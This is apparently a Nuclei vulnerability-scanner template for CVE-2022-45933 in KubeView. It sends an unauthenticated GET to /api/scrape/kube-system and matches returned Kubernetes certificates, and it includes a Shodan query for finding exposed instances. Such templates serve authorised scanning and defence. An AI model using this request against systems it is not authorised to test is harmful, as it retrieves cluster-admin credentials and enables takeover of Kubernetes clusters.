id: CVE-2022-45933 info: name: KubeView - Information disclosure author: For3stCo1d severity: critical description: | KubeView through 0.1.31 allows attackers to obtain control of a Kubernetes cluster because api/scrape/kube-system does not require authentication, and retrieves certificate files that can be used for authentication as kube-admin. NOTE: the vendor's position is that KubeView was a "fun side project and a learning exercise," and not "very secure." reference: - https://github.com/benc-uk/kubeview/issues/95 - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-45933 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2022-45933 cwe-id: CWE-287 metadata: shodan-query: http.title:"KubeView" verified: "true" tags: cve,cve2022,kubeview,kubernetes,exposure requests: - method: GET path: - "{{BaseURL}}/api/scrape/kube-system" matchers-condition: and matchers: - type: word part: body words: - 'BEGIN CERTIFICATE' - 'END CERTIFICATE' - 'kubernetes.io' condition: and - type: status status: - 200